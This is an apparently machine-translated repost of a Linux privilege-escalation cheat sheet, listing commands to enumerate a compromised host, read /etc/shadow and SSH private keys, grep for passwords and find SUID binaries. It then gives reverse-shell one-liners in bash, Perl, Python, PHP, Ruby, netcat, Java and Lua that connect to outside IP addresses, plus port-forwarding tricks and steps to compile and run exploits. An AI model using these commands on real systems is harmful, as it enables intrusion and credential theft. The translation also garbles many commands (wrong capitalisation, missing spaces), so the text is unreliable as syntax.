The common command set for Linux to raise weights

Source: Internet
Author: User
Tags lua readable syslog

Reprint: http://www.myhack58.com/Article/html/3/8/2017/83236.htm0x00 Operating system related

Operating system Type version

    1. Cat/etc/issue
    2. Cat/etc/*-release
    3. Cat/etc/lsb-release # Debian
    4. Cat/etc/redhat-release # Redhat

Kernel version, whether it is 64-bit

    1. Cat/proc/version
    2. Uname-a
    3. Uname-mrs
    4. Rpm-q kernel
    5. DMESG | grep Linux
    6. Ls/boot | grep vmlinuz-

Environment variables

    1. Cat/etc/profile
    2. Cat/etc/bashrc
    3. Cat ~/.bash_profile
    4. Cat ~/.BASHRC
    5. Cat ~/.bash_logout
    6. Env
    7. Set

See if a printer is available

    1. Lpstat-a
0X01 Applications related to services

View running programs and their corresponding user rights

    1. PS aux
    2. Ps-ef
    3. Top
    4. Cat/etc/services

A process running with root privileges

    1. PS aux | grep root
    2. Ps-ef | grep root

View installed Apps

    1. ls-alh/usr/bin/
    2. ls-alh/sbin/
    3. Dpkg-l
    4. Rpm-qa
    5. Ls-alh/var/cache/apt/archives
    6. ls-alh/var/cache/yum/

Configuration files for some services

    1. Cat/etc/syslog.conf
    2. Cat/etc/chttp.conf
    3. Cat/etc/lighttpd.conf
    4. Cat/etc/cups/cupsd.conf
    5. Cat/etc/inetd.conf
    6. Cat/etc/apache2/apache2.conf
    7. Cat/etc/my.conf
    8. Cat/etc/httpd/conf/httpd.conf
    9. Cat/opt/lampp/etc/httpd.conf
    10. ls-arl/etc/| awk ' $ ~/^.*r.*/'

Scheduled Tasks

    1. Crontab-l
    2. Ls-alh/var/spool/cron
    3. ls-al/etc/| grep cron
    4. ls-al/etc/cron*
    5. cat/etc/cron*
    6. Cat/etc/at.allow
    7. Cat/etc/at.deny
    8. Cat/etc/cron.allow
    9. Cat/etc/cron.deny
    10. Cat/etc/crontab
    11. Cat/etc/anacrontab
    12. Cat/var/spool/cron/crontabs/root

Find the stored plaintext user name, password

    1. Grep-i user [filename]
    2. Grep-i pass [filename]
    3. Grep-c 5 "Password" [filename]
    4. Find. -name "*.php"-print0 | xargs-0 grep-i-N "var $password" # Joomla
0X02 Communication and network related

View current network Address

    1. /sbin/ifconfig-a
    2. Cat/etc/network/interfaces
    3. Cat/etc/sysconfig/network

View network configuration, DNS,DHCP, gateways

    1. Cat/etc/resolv.conf
    2. Cat/etc/sysconfig/network
    3. Cat/etc/networks
    4. Iptables-l
    5. Hostname
    6. DnsDomainName

View network traffic

    1. Lsof-i
    2. Lsof-i: 80
    3. grep 80/etc/services
    4. Netstat-antup
    5. Netstat-antpx
    6. Netstat-tulpn
    7. Chkconfig--list
    8. Chkconfig--list | grep 3:on
    9. Last
    10. W

View Cache

    1. Arp-e
    2. Route
    3. /sbin/route-nee

Tcpdump

    1. Tcpdump TCP DST 192.168.1.7 and TCP DST 10.2.2.222 21

tcpdump TCP DST [IP] [port] and TCP DST [IP] [port]

Interactive shell

Bash version:

    1. Bash-i >&/dev/tcp/10.0.0.1/8080 0>&1

Perl version:

    1. Perl-e ' use Socket; $i = "10.0.0.1"; $p =1234;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '

Python version:

    1. Python-c ' Import socket,subprocess,os;s=socket.socket (socket.af_inet,socket. SOCK_STREAM); S.connect (("10.0.0.1", 1234)); Os.dup2 (S.fileno (), 0); Os.dup2 (S.fileno (), 1); Os.dup2 (S.fileno (), 2);p =subprocess.call (["/bin/sh", "-I"]); '

PHP Version:

    1. Php-r ' $sock =fsockopen ("10.0.0.1", 1234); EXEC ("/bin/sh-i <&3 >&3 2>&3"); '

Ruby version:

    1. Ruby-rsocket-e ' F=tcpsocket.open ("10.0.0.1", 1234). To_i;exec sprintf ("/bin/sh-i <&%d >&%d 2>&%d ", F,f,f) '

NC Version:

    1. NC-E/bin/sh 223.8.200.234 1234

NC does not use-e:

    1. Mknod/tmp/backpipe P
    2. /bin/sh 0</tmp/backpipe | NC attackerip Listenport 1>/tmp/backpipe

Mknod

    1. Mknod backpipe P && telnet 173.214.173.151 8080 0backpipe

Java version:

    1. R = Runtime.getruntime ()
    2. p = r.exec (["/bin/bash", "-C", "Exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | and" read line; do \ $line 2&G T;&5 >&5; Done "] as string[])
    3. P.waitfor ()

LUA version:

    1. Lua-e "require (' socket '); require (' OS '); t=socket.tcp (); T:connect (' 202.103.243.122 ', ' 1234 '); Os.execute ('/bin/sh-i <&3 >&3 2>&3 '); "

Port forwarding

LCX-<listen|tran|slave>

    1. Lcx-listen 4567 33891 #Attacker
    2. Lcx-slave 111.222.333.444 4567 127.0.0.1 3389 # on the targets

SSH-[L/R] [local port]:[remote ip]:[remote Port] [local user]@[local IP]

    1. Ssh-l 8080:127.0.0.1:80 [email protected] # Local Port
    2. Ssh-r 8080:127.0.0.1:80 [email protected] # Remote Port

Mknod Backpipe p; NC-L-P [remote port] < Backpipe | NC [local IP] [local port] >backpipe

    1. Mknod Backpipe p; Nc-l-P 8080 < Backpipe | NC 10.1.1.251 >backpipe
    2. Mknod Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow 1>backpipe # Proxy (Port 8080)
    3. Mknod Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow & 1>backpipe # Proxy Monitor (Port 8080)

Tunnel

    1. Ssh-d 127.0.0.1:9050-n [Username]@[ip]
    2. Proxychains ifconfig
0X03 User-related

User Information

    1. Id
    2. W.H.O.
    3. W
    4. Last
    5. cat/etc/passwd
    6. Cat/etc/group
    7. Cat/etc/shadow
    8. ls-alh/var/mail/
    9. Grep-v-E "^#"/etc/passwd | Awk-f: ' $ = = 0 {print '} ' # list super users
    10. Awk-f: ' ($ = = "0") {print} '/etc/passwd #列出超级用户
    11. Cat/etc/sudoers
    12. Sudo-l

List of home directories

    1. ls-ahlr/root/
    2. ls-ahlr/home/

Find the password from the configuration file

    1. Cat/var/apache2/config.inc
    2. Cat/var/lib/mysql/mysql/user. MYD
    3. Cat/root/anaconda-ks.cfg

See other user's action record

    1. Cat ~/.bash_history
    2. Cat ~/.nano_history
    3. Cat ~/.atftp_history
    4. Cat ~/.mysql_history
    5. Cat ~/.php_history

SSH private key

    1. Cat ~/.ssh/authorized_keys
    2. Cat ~/.ssh/identity.pub
    3. Cat ~/.ssh/identity
    4. Cat ~/.ssh/id_rsa.pub
    5. Cat ~/.ssh/id_rsa
    6. Cat ~/.ssh/id_dsa.pub
    7. Cat ~/.SSH/ID_DSA
    8. Cat/etc/ssh/ssh_config
    9. Cat/etc/ssh/sshd_config
    10. Cat/etc/ssh/ssh_host_dsa_key.pub
    11. Cat/etc/ssh/ssh_host_dsa_key
    12. Cat/etc/ssh/ssh_host_rsa_key.pub
    13. Cat/etc/ssh/ssh_host_rsa_key
    14. Cat/etc/ssh/ssh_host_key.pub
    15. Cat/etc/ssh/ssh_host_key
0x04 File System Related

/etc/Directory below file

    1. ls-arl/etc/| awk ' $ ~/^.*w.*/' 2>/dev/null # anyone
    2. ls-arl/etc/| awk ' $ ~/^. w/' 2>/dev/null # Owner
    3. ls-arl/etc/| awk ' $ ~/^.....w/' 2>/dev/null # Group
    4. ls-arl/etc/| awk ' $ ~/w.$/' 2>/dev/null # Other
    5. find/etc/-readable-type F 2>/dev/null # anyone
    6. find/etc/-readable-type f-maxdepth 1 2>/dev/null # anyone

Log file

    1. Ls-alh/var/log
    2. Ls-alh/var/mail
    3. Ls-alh/var/spool
    4. Ls-alh/var/spool/lpd
    5. Ls-alh/var/lib/pgsql
    6. Ls-alh/var/lib/mysql
    7. Cat/var/lib/dhcp3/dhclient.leases

View Web site Files

    1. ls-alhr/var/www/
    2. ls-alhr/srv/www/htdocs/
    3. ls-alhr/usr/local/www/apache22/data/
    4. ls-alhr/opt/lampp/htdocs/
    5. ls-alhr/var/www/html/

Common Log files

  1. Cat/etc/httpd/logs/access_log
  2. Cat/etc/httpd/logs/access.log
  3. Cat/etc/httpd/logs/error_log
  4. Cat/etc/httpd/logs/error.log
  5. Cat/var/log/apache2/access_log
  6. Cat/var/log/apache2/access.log
  7. Cat/var/log/apache2/error_log
  8. Cat/var/log/apache2/error.log
  9. Cat/var/log/apache/access_log
  10. Cat/var/log/apache/access.log
  11. Cat/var/log/auth.log
  12. Cat/var/log/chttp.log
  13. Cat/var/log/cups/error_log
  14. Cat/var/log/dpkg.log
  15. Cat/var/log/faillog
  16. Cat/var/log/httpd/access_log
  17. Cat/var/log/httpd/access.log
  18. Cat/var/log/httpd/error_log
  19. Cat/var/log/httpd/error.log
  20. Cat/var/log/lastlog
  21. Cat/var/log/lighttpd/access.log
  22. Cat/var/log/lighttpd/error.log
  23. Cat/var/log/lighttpd/lighttpd.access.log
  24. Cat/var/log/lighttpd/lighttpd.error.log
  25. Cat/var/log/messages
  26. Cat/var/log/secure
  27. Cat/var/log/syslog
  28. Cat/var/log/wtmp
  29. Cat/var/log/xferlog
  30. Cat/var/log/yum.log
  31. Cat/var/run/utmp
  32. Cat/var/webmin/miniserv.log
  33. Cat/var/www/logs/access_log
  34. Cat/var/www/logs/access.log
  35. ls-alh/var/lib/dhcp3/
  36. ls-alh/var/log/postgresql/
  37. ls-alh/var/log/proftpd/
  38. ls-alh/var/log/samba/

File mount

    1. Mount
    2. Df-h
    3. Cat/etc/fstab

Find command

    1. Find/-perm-1000-type D 2>/dev/null # Only the directory owner can change the delete
    2. Find/-perm-g=s-type F 2>/dev/null # SGID (chmod)-run as the group, not the user who started it.
    3. Find/-perm-u=s-type F 2>/dev/null # SUID (chmod 4000)-run as the owner, not the user who started it.
    4. Find/-perm-g=s-o-perm-u=s-type F 2>/dev/null # SGID or SUID
    5. For i in ' locate-r ' bin$ "'; Do find $i \ (-perm-4000-o-perm-2000 \)-type F 2>/dev/null; Done # from the following locations:/bin,/sbin,/usr/bin,/usr/sbin,/usr/local/bin,/usr/local/sbin or other bin directories looking for
    6. Find/-perm-g=s-o-perm-4000! -type l-maxdepth 3-exec ls-ld {} \; 2>/dev/null #从/,sgud or suid to find, exclude symbolic links, depth of 3 folders, display a detailed list and remove error messages

Find a writable directory

    1. Find/-writable-type D 2>/dev/null # writable Directory
    2. Find/-perm-222-type D 2>/dev/null # writable Directory
    3. Find/-perm-o w-type d 2>/dev/null # writable Directory
    4. Find/-perm-o x-type d 2>/dev/null # executable directory
    5. Find/\ (-perm-o w-perm-o x \)-type d 2>/dev/null # writable executable
    6. Directory

Find Files

    1. Find/-xdev-type d \ (-perm-0002-a!-perm-1000 \)-print 2>/dev/null # writable file
    2. Find/dir-xdev \ (-nouser-o-nogroup \)-print 2>/dev/null # no owner file
0x05 Preparation and attack

View language Support

    1. Find/-name perl*
    2. Find/-name python*
    3. Find/-name gcc*
    4. Find/-name cc

View Upload Method

    1. Find/-name wget
    2. Find/-name nc*
    3. Find/-name netcat*
    4. Find/-name tftp*
    5. Find/-name FTP

Find EXP
Http://www.exploit-db.com
Http://1337day.com
Http://www.securiteam.com
Http://www.securityfocus.com
Http://www.exploitsearch.net
http://metasploit.com/modules/
Http://securityreason.com
Http://seclists.org/fulldisclosure/
http://www.google.com

Compiling exp

    1. which GCC
    2. GCC exp.c-o Exp

Run

    1. CHMOD +x Exp
    2. ./exp
0X06 Power Assist Script

LineNum

linuxprivchecker.py

Not all of the above, there may be any errors, please make a big correction or supplement. Learn to communicate.

The common command set for Linux to raise weights

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.